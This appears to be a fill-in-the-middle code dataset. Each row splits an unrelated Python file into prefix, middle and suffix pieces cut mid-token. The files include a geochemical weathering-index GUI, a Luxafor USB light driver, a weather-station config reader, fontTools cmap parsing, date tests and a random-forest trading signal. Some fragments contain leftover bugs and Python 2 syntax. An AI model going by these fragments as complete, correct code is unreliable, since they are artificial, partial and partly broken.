prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
'Fe3O4': 231.531, 'BaO': 153.326, 'SrO': 103.619, 'Cr2O3': 151.98919999999998, } def __init__(self, parent=None, df=pd.DataFrame()): QMainWindow.__init__(self, parent) self.setWindowTitle('Chemical Index of Alteration & Index of Compositional Variability') self.items = [] self._df = df self._df.reindex() if (len(df) > 0): self._changed = True # print('DataFrame recieved to CIA') self.raw = df self.raw = self.CleanDataFile(df) self.rawitems = self.raw.columns.values.tolist() for i in self.rawitems: if i not in self.unuseful: self.items.append(i) else: pass self.create_main_frame() self.create_status_bar() def create_main_frame(self): self.resize(800,600) self.main_frame = QWidget() self.dpi = 128 self.setWindowTitle(
'Chemical Index of Alteration & Index of Compositional Variability') self.tableView = CustomQTableView(self.main_fr
ame) self.tableView.setObjectName('tableView') self.tableView.setSortingEnabled(True) self.textbox = GrowingTextEdit(self) self.textbox.setText(self.reference) # Other GUI controls self.save_button = QPushButton('&Save') self.save_button.clicked.connect(self.saveDataFile) # # Layout with box sizers # self.hbox = QHBoxLayout() for w in [self.save_button]: self.hbox.addWidget(w) self.hbox.setAlignment(w, Qt.AlignVCenter) self.vbox = QVBoxLayout() self.vbox.addWidget(self.tableView) #self.vbox.addWidget(self.tableView) self.vbox.addLayout(self.hbox) self.vbox.addWidget(self.textbox) self.main_frame.setLayout(self.vbox) self.setCentralWidget(self.main_frame) def Read(self, inpoints): points = [] for i in inpoints: points.append(i.split()) result = [] for i in points: for l in range(len(i)): a = float((i[l].split(','))[0]) a = a * self.x_scale b = float((i[l].split(','))[1]) b = (self.height_load - b) * self.y_scale result.append((a, b)) return (result) def CIA(self): self.WholeData = [] dataframe=pd.DataFrame() dataframe = self._df #dataframe.set_index('Label') ItemsAvalibale = dataframe.columns.values.tolist() Indexes = dataframe.index.values.tolist() #ItemsToCheck = ['Label','SiO2','Al2O3','Fe2O3','MgO','CaO','Na2O','K2O','P2O5','MnO','TiO2'] ItemsToTest = ['Number', 'Tag', 'Name', 'Author', 'DataType', 'Marker', 'Color', 'Size', 'Alpha', 'Style', 'Width'] for i in ItemsAvalibale: if 'O' not in i and i !='Label': dataframe = dataframe.drop(i, 1) WholeItemsAvalibale = dataframe.columns.values.tolist() ItemsAvalibale = dataframe.columns.values.tolist() Indexes = dataframe.index.values.tolist() if 'Whole' not in WholeItemsAvalibale: WholeItemsAvalibale.append('Whole') if 'CIA' not in WholeItemsAvalibale: WholeItemsAvalibale.append('CIA') if 'ICV' not in WholeItemsAvalibale: WholeItemsAvalibale.append('ICV') if 'PIA' not in WholeItemsAvalibale: WholeItemsAvalibale.append('PIA') if 'CIW' not in WholeItemsAvalibale: WholeItemsAvalibale.append('CIW') if 'CIW\'' not in WholeItemsAvalibale: WholeItemsAvalibale.append('CIW\'') print('index',Indexes,'\ncolums',WholeItemsAvalibale) WholeMole=[] WholeList=[] dataframe = dataframe.dropna(axis=1,how='all') print(dataframe) for j in Indexes: tmpList=[] tmpMoleSum=0 tmpcia=0 tmpAl2O3=0 tmpCaO=0 tmpNa2O=0 tmpK2O=0 tmpP2O5=0 tmpFe2O3=0 tmpMgO=0 tmpMnO=0 tmpTiO2=0 #ICV =(Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995) for i in ItemsAvalibale: if i in self.BaseMass: m=dataframe.at[j,i] n=self.BaseMass[i] #print('\nm & n is \t',m,n) tmpmole= m/n #print(tmpmole) tmpMoleSum = tmpMoleSum + tmpmole #tmpList.append(dataframe.at[i,j]) #print('\n total mole is',tmpMoleSum) for i in ItemsAvalibale: if i in self.BaseMass: tmpdata= 100*(dataframe.at[j,i]/self.BaseMass[i])/tmpMoleSum tmpList.append(tmpdata) #print(i, tmpdata) if i =='Al2O3': tmpAl2O3=tmpdata elif i =='CaO': tmpCaO=tmpdata elif i =='Na2O': tmpNa2O = tmpdata elif i =='K2O': tmpK2O=tmpdata elif i =='P2O5': tmpP2O5=tmpdata elif i =='Fe2O3': tmpFe2O3=tmpdata elif i == 'MgO': tmpMgO = tmpdata elif i == 'MnO': tmpMnO = tmpdata elif i == 'TiO2': tmpTiO2 = tmpdata elif i == 'Label' : tmpdata = dataframe.at[j,i] tmpList.append(tmpdata) elif i in WholeItemsAvalibale: del WholeItemsAvalibale[WholeItemsAvalibale.index(i)] tmpList.append(tmpMoleSum) usedCaO=0 middleCaO= tmpCaO-(10/3.0*tmpP2O5) if middleCaO< tmpNa2O: usedCaO=middleCaO else: usedCaO=tmpNa2O #print(tmpAl2O3, usedCaO, tmpK2O, tmpNa2O) CIA=tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O+tmpK2O)*100 tmpList.append(CIA) ICV =(tmpFe2O3+tmpK2O+tmpNa2O+usedCaO+tmpMgO+tmpMnO+tmpTiO2)/tmpAl2O3 #(Cox,1995) tmpList.append(ICV) PIA = ((tmpAl2O3-tmpK2O)/(tmpAl2O3-tmpK2O+usedCaO+tmpNa2O))*100 tmpList.append(PIA) CIW = (tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O))*100 tmpList.append(CIW) CIW2 = (tmpAl2O3/(tmpAl2O3+tmpNa2O))*100 tmpList.append(CIW2) ''' CIA = [Al2O3/(Al2O3+CaO*+Na2O+K2O]×100 ICV = (Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995) PIA = {(Al2O3-K2O)/[(Al2O3-K2O)+CaO*+Na2O]}×100 CIW = [Al2O3/(Al2O3+CaO*+Na2O)]×100 CIW' = [Al2O3/(Al2O3+Na2O)]×100 ''' #print(len(tmpList)) WholeList.append(tmpList) pass print(len(WholeList)) print(len(WholeItemsAvalibale)) df = pd.DataFrame(WholeList,columns=WholeItemsAvalibale) self.useddf = df self.tableView.setModel(PandasModel(self.useddf)) self.show() def saveDataFile(self): # if self.model._changed == True: # print('changed') # print(self.model._df) DataFileOutput, ok2 = QFileDialog.getSaveFileName(self, '文件保存', 'C:/', 'Excel Files (*.xlsx);;CSV Files (*.csv)') # 数据文件保存输出 if (DataFileOutput != ''): if ('csv' in DataFileOutput): self.useddf.to_csv(DataFileOutput, sep=',', encoding='utf-8') elif ('xls' in DataFileOutput): self.useddf.to_excel(D
# -*- coding: utf-8 -*- import usb class LuxaforFlag(object): DEVICE_VENDOR_ID = 0x04d8 DEVICE_PRODUCT_ID = 0xf372 MODE_STATIC_COLOUR = 1 MODE_FADE_COLOUR = 2 MODE_STROBE = 3 MODE_WAVE = 4 MODE_PATTERN = 6 LED_TAB_1 = 1 LED_TAB_2 = 2 LED_TAB_3 = 3 LED_BACK_1 = 4 LED_BACK_2 = 5 LED_BACK_3 = 6 LED_TAB_SIDE = 65 LED_BACK_SIDE = 66 LED_ALL = 255 WAVE_SINGLE_SMALL = 1 WAVE_SINGLE_LARGE = 2 WAVE_DOUBLE_SMALL = 3 WAVE_DOUBLE_LARGE = 4 PATTERN_LUXAFOR = 1 PATTERN_RANDOM1 = 2 PATTERN_RANDOM2 = 3 PATTERN_RANDOM3 = 4 PATTERN_POLICE = 5 PATTERN_RANDOM4 = 6 PATTERN_RANDOM5 = 7 PATTERN_RAINBOWWAVE = 8 def __init__(self): self.device = None def get_device(self): """ Retrieve a PyUSB device for the Luxafor Flag. Will lazy load the device as necessary. """ if not self.device: self.device = self.find_device() self.setup_device(self.device) return self.device def setup_device(self, device): """ Performs initialisation on the device. """ try: # Gets around "Resource busy" errors device.detach_kernel_driver(0) except Exception as e: pass device.set_configuration() def find_device(self): """ Attempts to retrieve the Luxafor Flag device using the known Vendor and Product IDs. """ device = usb.core.find( idVendor=LuxaforFlag.DEVICE_VENDOR_ID, idProduct=LuxaforFlag.DEVICE_PRODUCT_ID ) return device def write(self, values): """ Send values to the device. Expects the values to be a List of command byte codes. Refer to the individual commands for more information on the specific command codes. """ self.get_device().write(1, values) # Sometimes the flag simply ignores the command. Unknown if this # is an issue with PyUSB or the flag itself. But sending the # command again works a treat. self.get_device().write(1, values) def create_static_colour_command(self, led, r, g, b): return [LuxaforFlag.MODE_STATIC_COLOUR, led, r, g, b] def create_fade_colour_command(self, led, r, g, b, duration=20): return [LuxaforFlag.MODE_FADE_COLOUR, led, r, g, b, duration] def create_strobe_command(self, led, r, g, b, duration=20, repeat=2): return [LuxaforFlag.MODE_STROBE, led, r, g, b, duration, 0, repeat] def create_wave_command(self, wave_type, r, g, b, duration=20, repeat=1): return [ LuxaforFlag.MODE_WAVE, wave_type, r, g, b, duration, 0, repeat ] def create_pattern_command(self, pattern_id, repeat=1): return [LuxaforFlag.MODE_PATTERN, pattern_id, repeat] def off(self): """ Turn off all LEDs. """ self.do_static_colour(255, 0, 0, 0) def do_static_colour(self, leds, r, g, b): """ Set a single LED or multiple LEDs immediately to the specified colour. """ self._do_multi_led_command( self.create_static_colour_command, leds, r, g, b ) def do_fade_colour(self, leds, r, g, b, duration): """ Fade a single LED or multiple LEDs from their current colour to a new colour for the supplied duration. """ self._do_multi_led_command( self.create_fade_colour_command, leds, r, g, b, duration ) def do_strobe(self, led, r, g, b, duration, repeat): """ Flash the specified LED a specific colour, giving the duration of each flash and the number of times to repeat. Unfortunately this command does not sup
port multiple specific LEDs. """ command = self.create_strobe_command(led, r, g, b, duration, repeat) self.write(command) def do_wave(self, wave_type, r, g, b, duration, repeat
): """ Animate the flag with a wave pattern of the given type, using the specified colour, duration and number of times to repeat. """ command = self.create_wave_command( wave_type, r, g, b, duration, repeat ) self.write(command) def do_pattern(self, pattern, repeat): """ Execute a built in pattern a given number of times. """ command = self.create_pattern_command(pattern, repeat) self.write(command) def _do_multi_led_command( self, create_command_function, leds, *args, **kwargs ): try: iter(leds) except TypeError: command = create_command_function(leds, *args, **kwargs) self.write(command) else: for led in leds: command = create_command_function(led, *args, **kwargs) self.write(command)
0]*1024 #self._ = self.write(t); #print "CWeatherStationConfig._CheckSumm (should be retrieved) --> 0x%x" % self._CheckSumm def read(self,buf,start): self.logger.debug("wsconfig") nbuf=[0] nbuf[0]=buf[0] #print "read",nbuf[0] CheckSumm = nbuf[0][43+start] | (nbuf[0][42+start] << 8); self._CheckSumm = CheckSumm; CheckSumm -= 7; self._ClockMode = nbuf[0][0+start] & 1; self._TemperatureFormat = (nbuf[0][0+start] >> 1) & 1; self._PressureFormat = (nbuf[0][0+start] >> 2) & 1; self._RainFormat = (nbuf[0][0+start] >> 3) & 1; self._WindspeedFormat = (nbuf[0][0+start] >> 4) & 0xF; self._WeatherThreshold = nbuf[0][1+start] & 0xF; self._StormThreshold = (nbuf[0][1+start] >> 4) & 0xF; self._LCDContrast = nbuf[0][2+start] & 0xF; self._LowBatFlags = (nbuf[0][2+start] >> 4) & 0xF; USBHardware.ReverseByteOrder(nbuf,3+start, 4) #buf=nbuf[0] #CWeatherStationConfig::readAlertFlags(thisa, buf + 3+start); USBHardware.ReverseByteOrder(nbuf, 7+start, 5); #v2 = USBHardware.ToTemperature(nbuf, 7+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempIndoor, v2); #v3 = USBHardware.ToTemperature(nbuf + 9+start, 0); #self._AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmTempIndoor, # LODWORD(v3)); #j___RTC_CheckEsp(v4); USBHardware.ReverseByteOrder(nbuf, 12+start, 5); #v5 = USBHardware.ToTemperature(nbuf, 12+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempOutdoor, v5); #v6 = USBHardware.ToTemperature(nbuf, 14+start, 0); #self._AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmTempOutdoor, # LODWORD(v6)); USBHardware.ReverseByteOrder(nbuf, 17+start, 2); #v8 = USBHardware.ToHumidity(nbuf, 17+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityIndoor, v8); #v9 = USBHardware.ToHumidity(nbuf, 18+start, 1); #self._AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmHumidityIndoor, # LODWORD(v9)); USBHardware.ReverseByteOrder(nbuf, 19+start, 2); #v11 = USBHardware.ToHumidity(nbuf, 19+start, 1); #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityOutdoor, v11); #v12 = USBHardware.ToHumidity(nbuf, 20+start, 1); #self._AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmHumidityOutdoor, # LODWORD(v12)); USBHardware.ReverseByteOrder(nbuf, 21+start, 4); #v14 = USBHardware.To4Pre3Post(nbuf, 21+start); #self._AlarmRain24H.baseclass_0.vfptr[2].__vecDelDtor((CWeatherStationAlarm *)&self._AlarmRain24H, LODWORD(v14)); self._HistoryInterval = nbuf[0][25+start] & 0xF; #USBHardware.ReverseByteOrder(nbuf, 26+start, 3u); ##v16 = USBHardware._ToWindspeed(nbuf, 26+start); #CWeatherStationWindAlarm::SetHighAlarmRaw(&self._AlarmGust, v16); #USBHardware.ReverseByteOrder(nbuf, 29+start, 5u); #USBHardware.ReadPressureShared(nbuf, 29+start, &a, &b); #v17 = Conversions::ToInhg(a); #v25 = b - v17; #if ( fabs(v25) > 1.0 ) #{ # Conversions::ToInhg(a); # v18 = CTracer::Instance(); # CTracer::WriteTrace(v18, 30, "low pressure alarm difference: %f"); #} #CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmPressure, a); USBHardware.ReverseByteOrder(nbuf, 34+start, 5); #USBHardware.ReadPressureShared(nbuf, 34+start, &a, &b); #v19 = Conversions::ToInhg(a); #v25 = b - v19; #if ( fabs(v25) > 1.0 ) #{ # Conversions::ToInhg(a); # v20 = CTracer::Instance(); # CTracer::WriteTrace(v20, 30, "high pressure alarm difference: %f"); #} #self._AlarmPressure.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor( # (CWeatherStationAlarm *)&self._AlarmPressure, # LODWORD(a)); t = nbuf[0][39+start]; t <<= 8; t |= nbuf[0][40+start]; t <<= 8; t |= nbuf[0][41+start]; #std::bitset<23>::bitset<23>((std::bitset<23> *)&v26, t); #self._ResetMinMaxFlags._Array[0] = v22; #for ( i = 0; i < 0x27; ++i ) for i in xrange(0, 38): CheckSumm -= nbuf[0][i+start]; #if ( CheckSumm ): for now is better to comment it #self._CheckSumm = -1; filename= "/etc/WV5Datastore.cfg" config = ConfigObj(filename) config.filename = filename config['ws28xx'] = {} config['ws28xx']['CheckSumm'] = str(self._CheckSumm) config['ws28xx']['ClockMode'] = str(self._ClockMode) config['ws28xx']['TemperatureFormat'] = str(self._TemperatureFormat) config['ws28xx']['PressureFormat'] = str(self._PressureFormat) config['ws28xx']['RainFormat'] = str(self._RainFormat) config['ws28xx']['WindspeedFormat'] = str(self._WindspeedFormat) config['ws28xx']['WeatherThreshold'] = str(self._WeatherThreshold) config['ws28xx']['StormThreshold'] = str(self._StormThreshold) config['ws28xx']['LCDContrast'] = str(self._LCDContrast) config['ws28xx']['LowBatFlags'] = str(self._LowBatFlags) config['ws28xx']['HistoryInterval'] = str(self._HistoryInterval) config.write() return 1; def write(self,buf): self.logger.debug("") new_buf = [0] new_buf[0]=buf[0] CheckSumm = 7; new_buf[0][0] = 16 * (self._WindspeedFormat & 0xF) + 8 * (self._RainFormat & 1) + 4 * (self._PressureFormat & 1) + 2 * (self._TemperatureFormat & 1) + self._ClockMode & 1; new_buf[0][1] = self._WeatherThreshold & 0xF | 16 * self._StormThreshold & 0xF0; new_buf[0][2] = self._LCDContrast & 0xF | 16 * self._LowBatFlags & 0xF0; #CWeatherStationConfig::writeAlertFlags(nbuf, 3); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_
AlarmTempIndoor); #v25 = v2; #v24 = CWeatherTraits.TemperatureOffset() + v2; #v21 = v24; #v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLow
Alarm(&thisa->_AlarmTempIndoor); #v4 = v22; #USBHardware::ToTempAlarmBytes(nbuf, 7, v22, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmTempOutdoor); #v25 = v4; #v24 = CWeatherTraits.TemperatureOffset() + v4; #v21 = v24; #v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmTempOutdoor); #v6 = v22; #USBHardware::ToTempAlarmBytes(nbuf, 12, v22, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityIndoor); #v21 = v6; #v8 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityIndoor); #v9 = v8; #USBHardware::ToHumidityAlarmBytes(nbuf, 17, v9, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityOutdoor); #v21 = v8; #v11 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityOutdoor); #v12 = v11; #USBHardware::ToHumidityAlarmBytes(nbuf, 19, v12, v21); #((void (__thiscall *)(CWeatherStationHighAlarm *))thisa->_AlarmRain24H.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmRain24H); #v21 = v11; #USBHardware::ToRainAlarmBytes(nbuf, 21, v21); new_buf[0][25] = self._HistoryInterval & 0xF; #v21 = CWeatherStationWindAlarm::GetHighAlarmRaw(&thisa->_AlarmGust); #USBHardware::_ToWindspeedAlarmBytes(nbuf, 26, v21); #v21 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure); #v21 = Conversions::ToInhg(v21); #v14 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure); #v15 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure); #USBHardware::ToPressureBytesShared(nbuf, 29, v15, v21); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure); #((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure); #USBHardware::ToPressureBytesShared(nbuf, 34, Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure)), Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->
from....import a from...import b from..import c from.import d
from : keyword.control.import.python, source.python .... : punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python a : source.python from : keyword.control.import.python, source.python ...
: punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python b : source.python from : keyword.control.import.python, source.python .. : punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python c : source.python from : keyword.control.import.python, source.python . : punctuation.separator.period.python, source.python import : keyword.control.import.python, source.python : source.python d : source.python
der(self, data, ttFont): format, length, language = struct.unpack(">HHH", data[:6]) assert len(data) == length, "corrupt cmap table format %d (data length: %d, header length: %d)" % (format, len(data), length) self.format = int(format) self.length = int(length) self.language = int(language) self.data = data[6:] self.ttFont = ttFont def toXML(self, writer, ttFont): writer.begintag(self.__class__.__name__, [ ("platformID", self.platformID), ("platEncID", self.platEncID), ("language", self.language), ]) writer.newline() codes = sorted(self.cmap.items()) self._writeCodes(codes, writer) writer.endtag(self.__class__.__name__) writer.newline() def isUnicode(self): return (self.platformID == 0 or (self.platformID == 3 and self.platEncID in [1, 10])) def isSymbol(self): return self.platformID == 3 and self.platEncID == 0 def _writeCodes(self, codes, writer): isUnicode = self.isUnicode() for code, name in codes: writer.simpletag("map", code=hex(code), name=name) if isUnicode: writer.comment(Unicode[code]) writer.newline() def __lt__(self, other): if not isinstance(other, CmapSubtable): return NotImplemented # implemented so that list.sort() sorts according to the spec. selfTuple = ( getattr(self, "platformID", None), getattr(self, "platEncID", None), getattr(self, "language", None), self.__dict__) otherTuple = ( getattr(other, "platformID", None), getattr(other, "platEncID", None), getattr(other, "language", None), other.__dict__) return selfTuple < otherTuple class cmap_format_0(CmapSubtable):
def decompile(self, data, ttFont): # we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None. # If not, someone is calling the subtable decompile() directly, and must provide both args. if data is not None and ttFont is not None: self.decompileHeader(data[offset:offset+int(length)], ttFont) else: assert (data
is None and ttFont is None), "Need both data and ttFont arguments" data = self.data # decompileHeader assigns the data after the header to self.data assert 262 == self.length, "Format 0 cmap subtable not 262 bytes" glyphIdArray = array.array("B") glyphIdArray.fromstring(self.data) self.cmap = cmap = {} lenArray = len(glyphIdArray) charCodes = list(range(lenArray)) names = map(self.ttFont.getGlyphName, glyphIdArray) list(map(operator.setitem, [cmap]*lenArray, charCodes, names)) def compile(self, ttFont): if self.data: return struct.pack(">HHH", 0, 262, self.language) + self.data charCodeList = sorted(self.cmap.items()) charCodes = [entry[0] for entry in charCodeList] valueList = [entry[1] for entry in charCodeList] assert charCodes == list(range(256)) valueList = map(ttFont.getGlyphID, valueList) glyphIdArray = array.array("B", valueList) data = struct.pack(">HHH", 0, 262, self.language) + glyphIdArray.tostring() assert len(data) == 262 return data def fromXML(self, name, attrs, content, ttFont): self.language = safeEval(attrs["language"]) if not hasattr(self, "cmap"): self.cmap = {} cmap = self.cmap for element in content: if not isinstance(element, tuple): continue name, attrs, content = element if name != "map": continue cmap[safeEval(attrs["code"])] = attrs["name"] subHeaderFormat = ">HHhH" class SubHeader(object): def __init__(self): self.firstCode = None self.entryCount = None self.idDelta = None self.idRangeOffset = None self.glyphIndexArray = [] class cmap_format_2(CmapSubtable): def setIDDelta(self, subHeader): subHeader.idDelta = 0 # find the minGI which is not zero. minGI = subHeader.glyphIndexArray[0] for gid in subHeader.glyphIndexArray: if (gid != 0) and (gid < minGI): minGI = gid # The lowest gid in glyphIndexArray, after subtracting idDelta, must be 1. # idDelta is a short, and must be between -32K and 32K. minGI can be between 1 and 64K. # We would like to pick an idDelta such that the first glyphArray GID is 1, # so that we are more likely to be able to combine glypharray GID subranges. # This means that we have a problem when minGI is > 32K # Since the final gi is reconstructed from the glyphArray GID by: # (short)finalGID = (gid + idDelta) % 0x10000), # we can get from a glypharray GID of 1 to a final GID of 65K by subtracting 2, and casting the # negative number to an unsigned short. if (minGI > 1): if minGI > 0x7FFF: subHeader.idDelta = -(0x10000 - minGI) -1 else: subHeader.idDelta = minGI -1 idDelta = subHeader.idDelta for i in range(subHeader.entryCount): gid = subHeader.glyphIndexArray[i] if gid > 0: subHeader.glyphIndexArray[i] = gid - idDelta def decompile(self, data, ttFont): # we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None. # If not, someone is calling the subtable decompile() directly, and must provide both args. if data is not None and ttFont is not None: self.decompileHeader(data[offset:offset+int(length)], ttFont) else: assert (data is None and ttFont is None), "Need both data and ttFont arguments" data = self.data # decompileHeader assigns the data after the header to self.data subHeaderKeys = [] maxSubHeaderindex = 0 # get the key array, and determine the number of subHeaders. allKeys = array.array("H") allKeys.fromstring(data[:512]) data = data[512:] if sys.byteorder != "big": allKeys.byteswap() subHeaderKeys = [ key//8 for key in allKeys] maxSubHeaderindex = max(subHeaderKeys) #Load subHeaders subHeaderList = [] pos = 0 for i in range(maxSubHeaderindex + 1): subHeader = SubHeader() (subHeader.firstCode, subHeader.entryCount, subHeader.idDelta, \ subHeader.idRangeOffset) = struct.unpack(subHeaderFormat, data[pos:pos + 8]) pos += 8 giDataPos = pos + subHeader.idRangeOffset-2 giList = array.array("H") giList.fromstring(data[giDataPos:giDataPos + subHeader.entryCount*2]) if sys.byteorder != "big": giList.byteswap() subHeader.glyphIndexArray = giList subHeaderList.append(subHeader) # How this gets processed. # Charcodes may be one or two bytes. # The first byte of a charcode is mapped through the subHeaderKeys, to select # a subHeader. For any subheader but 0, the next byte is then mapped through the # selected subheader. If subheader Index 0 is selected, then the byte itself is # mapped through the subheader, and there is no second byte. # Then assume that the subsequent byte is the first byte of the next charcode,and repeat. # # Each subheader references a range in the glyphIndexArray whose length is entryCount. # The range in glyphIndexArray referenced by a sunheader may overlap with the range in glyphIndexArray # referenced by another subheader. # The only subheader that will be referenced by more than one first-byte value is the subheader # that maps the entire range of glyphID values to glyphIndex 0, e.g notdef: # {firstChar 0, EntryCount 0,idDelta 0,idRangeOffset xx} # A byte being mapped though a subheader is treated as in index into a mapping of array index to font glyphIndex. # A subheader specifies a subrange within (0...256) by the # firstChar and EntryCount values. If the byte value is outside the subrange, then the glyphIndex is zero # (e.g. glyph not in font). # If the byte index is in the subrange, then an offset index is calculated as (byteIndex - firstChar). # The index to glyphIndex mapping is a subrange of the glyphIndexArray. You find the start of the subrange by # counting idRangeOffset bytes from the idRangeOffset word. The first value in this subrange is the # glyphIndex for the index firstChar. The offset index should then be used in this array to get the glyphIndex. # Example for Logocut-Medium # first byte of charcode = 129; selects subheader 1. # subheader 1 = {firstChar 64, EntryCount 108,idDelta 42,idRangeOffset 0252} # second byte of charCode = 66 # the index offset = 66-64 = 2. # The subrange of the glyphIndexAr
#!/usr/bin/env python # -*- coding: utf-8 -*- # Datetools provide a method of manipulating and working dates and times. # Copyright (C) 2013-2018 Chris Caron <lead2gold@gmail.com> # # This file is part of Datetools. Datetools is free software; you can # redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation; either version 2 of # the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. """ This is just a simple tool for testing that the output is as expected """ from datetime import datetime from dateblock import dateblock from datetime import date from datetime import time # Support python datetime object print dateblock("*/1
", ref=datetime(2000, 5, 3, 10, 10, 0)) # Support python date object print dateblock("*/1", ref=date(2000, 5, 3)) # Support python time object print dateblock("*/1", ref=time(20, 5, 3), block=False) # Time equals 'now' print dateblock("*/1", ref=None, block=False) # Epoch Time print dateblock("*/1", ref=7999434323, block=False) # Drift Time print dateblock("*/10 +5", ref=7999434323, block=False) # Blocking should never be possible if the tim
e is in the past print dateblock("*/10 +7", ref=999434323, block=True) # Drifting inline print dateblock("*/10 +5", ref=date(2000, 1, 1), block=False) # Drifting inline (with option specified, inline should over-ride) # Drifting without use of + print dateblock("*/10 * * * * * 5", ref=date(2000, 2, 1), block=False) # Drifting with multiple options specified print dateblock("* 10 +5,8", ref=date(2000, 3, 1), block=False)
import pandas as pd import numpy as np from random import sample from sklearn.ensemble import RandomForestClassifier def ML_BuySell(all_data, predictDate, predictors, previous_results, limit=0.0051, limit_comp=np.arange(-.015, 0.02, 0.001), days_previous=252, train_split=0.8, n=3,acc_limit=0.75): """ This function takes all the information about previous traddes and used a random forest model to predict what is going to happen on the query date. :param all_data: pandas DataFrame, All technical details. generated from Predictors class :param predictDate: pandas DateTime, The timestamp you want to look at :param predictors: array, containing the names of the technical indicators used. :param previous_results: pandas DataFrame, containing the daily percentage change :param limit: float, the minimum limit for which trades can occur :param limit_comp: numpy array, a list of percentages to check :param days_previous: int, How many previous days should be simulated :param train_split: float, Training/Testing split between (0, 1) :param n: int, number of random forrest classifiers :param acc_limit: float, specifies the minimum accuracy for a trade to take place. :return: pandas DataFrame containing Buy and Sell commands. """ # Split into testing and training data. ALLX_DATA = all_data.ix[all_data.index < predictDate, predictors] if len(ALLX_DATA) < days_previous: return ALLY_DATA = previous_results.ix[all_data
.index <= predictDate].shift(-1) ALLY_DATA = ALLY_DATA.drop(ALLY_DATA.index[-1]) fluc_m = [] X_TEST_B = ALLX_DATA[(-1 * days_previous):] Y_TEST_B = ALLY_DATA[(-1 * days_previous):] # Get parameters for the day in question PREDICT_X = all_data.ix[a
ll_data.index == predictDate, predictors] if PREDICT_X.empty: return pred_v = [] acc = [] for x in np.nditer(limit_comp): indices = sample(range(days_previous), int(np.round(days_previous * train_split))) X_TRAIN = X_TEST_B.ix[indices] Y_TRAIN = Y_TEST_B.ix[indices] X_TEST = X_TEST_B.drop(X_TEST_B.index[indices]) Y_TEST = Y_TEST_B.drop(Y_TEST_B.index[indices]) # Fit the training data fluc_m.append(RandomForestClassifier(n_estimators=n)) fluc_m[-1].fit(X_TRAIN, 1*(Y_TRAIN > x)) # See how well we did a = fluc_m[-1].score(X_TEST, 1*(Y_TEST > x)) acc.append(a) # Predict the future pred_v.append(fluc_m[-1].predict(PREDICT_X)[0]) # Make an estimate of the daily change change = 0 for i in range(1, len(limit_comp)): l = (pred_v[i - 1] > pred_v[i]) if l: change = change + (l* limit_comp[i]) # If it is more than what we want, precede. if change > limit: return pd.concat([ pd.DataFrame({"Price": all_data.ix[all_data.index == predictDate, "price"], "Regime": 1, "Signal": "Buy"}), pd.DataFrame({"Price": all_data.ix[all_data.index == predictDate, "price"], "Regime": -1, "Signal": "Sell"}) ]) else: return None
